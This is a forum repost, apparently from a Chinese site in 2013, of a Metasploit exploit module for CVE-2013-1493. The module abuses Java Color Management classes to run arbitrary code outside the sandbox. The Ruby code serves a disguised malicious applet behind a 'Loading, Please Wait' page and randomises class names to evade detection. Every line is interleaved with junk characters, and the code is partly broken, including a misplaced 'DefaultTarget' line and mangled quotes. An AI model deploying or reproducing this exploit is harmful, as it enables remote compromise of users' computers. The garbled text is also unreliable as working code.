##
% n. r3 `0 y+ V6 w" m" t' i4 g- P% l& G: q) s, P* ~! q
# This file is part of the Metasploit Framework and may be subject to4 N% ]+ A! ^9 h& w8 n+ T) n& T
# redistribution and commercial restrictions. Please see the Metasploit
( T( K/ s% r2 ?4 ?+ t9 l& D/ z# web site for more information on licensing and terms of use.3 h7 i5 L8 ~; A% \
# http://metasploit.com/
" l' }% _% T3 D& D$ H* z##3 [1 V$ {$ i' q! S$ }3 [4 d* v
require ‘msf/core’& c. Q/ L& f9 [; }; J
require ‘rex’
' K# i d* w4 M1 eclass Metasploit3 < Msf::Exploit::Remote
* w& W. g" A, T7 O( V( ~8 ARank = NormalRanking5 i& J8 r& T! K* ~* N
include Msf::Exploit::Remote::HttpServer::HTML
1 I0 [$ C9 V; x8 Z7 ~include Msf::Exploit::EXE& z9 i) E$ N# C* l$ I+ o2 F" _
include Msf::Exploit::Remote::BrowserAutopwn- `3 _/ A" ~( E/ p4 o( q
autopwn_info({ :javascript => false })( ?7 V r/ y# i5 | M" [" Z
def initialize( info = {} )8 _, g0 x" s- v h; ]# [9 C
super( update_info( info,
& T; M2 ]& B$ C‘Name’ => ‘Java CMM Remote Code Execution’," T4 b+ m+ J3 G
‘Description’ => %q{. O. p5 ~# f+ k! @! L% b
This module abuses the Color Management classes from a Java Applet to run
" n2 m* a1 i/ [% s2 J/ _& jarbitrary Java code outside of the sandbox as exploited in the wild in February
3 Q I1 R: j& i) C' Z6 Cand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
4 k/ \ v9 x: V; [& Oand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
9 `: e1 K5 ^+ v1 `/ v( j, P Csystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
% ~% T, \2 A# P B0 s. }5 C; f2 ?( iwarning in order to run the malicious applet.
+ t g4 T, Y" Q6 O3 p+ o},
& @9 ?/ A) @ b2 |3 [; w' ]‘License’ => MSF_LICENSE,& W6 i$ g2 Q9 m' e8 L/ G7 K
‘Author’ =>
. p" |/ w/ W# a( P4 l% {6 O'Unknown', # Vulnerability discovery and Exploit Y) q8 D- \+ _* J+ r0 L% v
'juan vazquez' # Metasploit module (just ported the published exploit) @1 E8 ?) x2 ?1 z( g
],
$ n% J$ F& H7 K3 Y: ^; ]‘References’ =>
5 ]% {0 v8 V. ? a& ^: m[0 a4 Q* ~/ w7 F6 W* E8 _' F! n
[ 'CVE', '2013-1493' ],
7 D6 S, |; b: h: V[ 'OSVDB', '90737' ],& ?$ S: l* i3 `) x9 \
[ 'BID', '58238' ],
: q. Y8 j1 }9 B$ }7 Q6 k[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
6 ^+ h! O: n, q7 S- \5 ~[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],6 ]% h" D2 c, T8 S- S- A8 B
[ 'URL', 'http://pastie.org/pastes/6581034' ]0 }6 h+ g$ T$ H4 q8 J; c1 ^ I
],3 g6 Z9 Y& J* }9 Y% ^
‘Platform’ => [ 'win', 'java' ],& q) @% e5 g' H" o- c& O- o7 J9 Y
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },3 b3 c% i' K$ d- i% n7 t6 Z
‘Targets’ =>5 C1 T: J: ^& ?
[! a9 D8 l: E- ?7 N9 @) X
[ 'Generic (Java Payload)',( g! B }+ j! M9 B) ?6 Q9 [% e
{* D6 @- m, j: Z3 R+ d
'Platform' => 'java',) Z. z0 J8 z8 N
'Arch' => ARCH_JAVA7 o& x# O1 E/ v3 y9 y2 b
}" |& _9 r6 H7 h7 s. r! Y! s
],( g7 J1 M% |( [3 t
[ 'Windows x86 (Native Payload)',
+ N1 t2 Y4 `9 _{
+ L5 h: W' D2 ]'Platform' => 'win',( } V# e h' y/ W( {/ A% q1 g6 N, T
'Arch' => ARCH_X86" K0 B5 y. ]$ e4 |. M$ j! q
}+ h1 T9 ]$ c1 s0 b$ `
]
2 m0 j2 |) J5 I( u6 R0 P1 t- \],' d: _; f" A6 h% ~+ J. c7 w
‘‘DisclosureDate’ => ‘Mar 01 2013′$ `- }3 M7 M% \8 V& ^6 u
))# z0 `3 c5 @7 W6 ~ N+ P% s k
end0 k) D, X9 n) B9 W& V
def setup
, I: I/ c6 {6 n" ?7 `8 {9 Mpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)5 }9 W* j6 S. z; w8 r5 p! R, a/ y
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
( B Q/ I6 e* Z3 mpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
, P4 b( n6 g8 z# t/ m@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }! d8 o( k7 M3 i! O
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”): V! {' I6 H2 e1 f: v. T
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
; M1 U1 E% {8 x" _path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
# I/ H' P2 ~& [7 _) H% d6 {+ Y@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) } `- T3 i6 i' M- \- [ f5 {& z* V
@init_class_name = rand_text_alpha(“Init”.length)! ` G7 R, o8 Q. t1 d1 D: C
@init_class.gsub!(“Init”, @init_class_name)4 y$ W9 B+ }( M+ j! c/ A+ D
super
0 j3 L0 l8 S/ A: N4 wend# @2 J n$ U4 j7 O' K. U4 j# z
def on_request_uri(cli, request)" a. D' J6 I3 M; l+ p" `, G( i
print_status(“handling request for #{request.uri}”)5 q& t5 G _7 ^' a& R( d# T3 B4 z; P; H
case request.uri+ Y# K" z0 X! q8 G% _
when /\.jar$/i/ f6 ~1 _7 u: e' L
jar = payload.encoded_jar) h; S+ I8 ?0 l
jar.add_file(“#{@init_class_name}.class”, @init_class)! t* e+ u$ j- a; h: d% N' q
jar.add_file(“Leak.class”, @leak_class)+ v$ G; l4 M$ w5 j( [
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)6 o$ m! Z8 n2 Q% v( q, s
jar.add_file(“MyColorSpace.class”, @color_space_class)
1 X) w3 ?% ?% u: b* KDefaultTarget’ => 1,* A/ N$ F9 O- X9 R6 c
metasploit_str = rand_text_alpha(“metasploit”.length)
0 t- T. T9 @# `" kpayload_str = rand_text_alpha(“payload”.length)
( v4 N9 N8 v% M7 Z2 i- X0 Hjar.entries.each { |entry|
; k! Y$ n9 W% G( r) n/ fentry.name.gsub!(“metasploit”, metasploit_str)# P8 m( i! e# a" ]0 H+ ^
entry.name.gsub!(“Payload”, payload_str)
2 w( U3 j$ ?1 ]6 X! fentry.data = entry.data.gsub(“metasploit”, metasploit_str)
: O9 _4 Q2 M: Rentry.data = entry.data.gsub(“Payload”, payload_str)
, V2 A8 J9 x! a3 E7 ~3 B}2 z( }+ ?% o3 J6 q w
jar.build_manifest
4 ]+ E9 h& g# s: Qsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })% V( W& e5 h- _
when /\/$/' B' _, i/ r g0 g) T
payload = regenerate_payload(cli)
. N9 ~$ _# ]1 j' B9 Bif not payload
9 Z# C5 Y' x) X, [ ]print_error(“Failed to generate the payload.”): F, N: h- u# D f5 q( N! j: {
send_not_found(cli)' u/ J1 k9 T( G1 `3 I/ z: M, k+ ]
return: U% l5 I6 G% p8 H0 c0 `
end
$ i) g* B4 y9 R0 i5 nsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })3 |) ^, R: N1 Y# n" b% k* u/ j
else
, m8 _$ H3 a% h6 A* ?( }! }4 bsend_redirect(cli, get_resource() + ‘/’, ”)
" p& ^7 C4 R. W+ Send
+ |% @& ?2 p# \end" J" N( C a; s! j+ J5 q$ A
def generate_html8 ]4 _, s+ }, e3 D) D7 L5 n! Q( J1 ?
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|4 r, [$ e) ~ v% a. m" U9 i
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|9 u8 M; G1 T$ I+ Y2 k0 ^4 W: l
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
- l/ h+ R- p) d) X( r; U- a* Mhtml += %Q|</applet></body></html>|
7 Y7 A4 C: W( X: N0 a9 z7 `1 treturn html4 E# ~9 s8 O* @; F, Y
end. v. u7 G# G6 h: q
end
0 P+ g' q7 z+ J( g1 e5 u( S: ]end
4 B0 Q, T9 M2 S; O9 W5 H8 W |
发表于 2013-4-4 17:31:17
收藏
支持
反对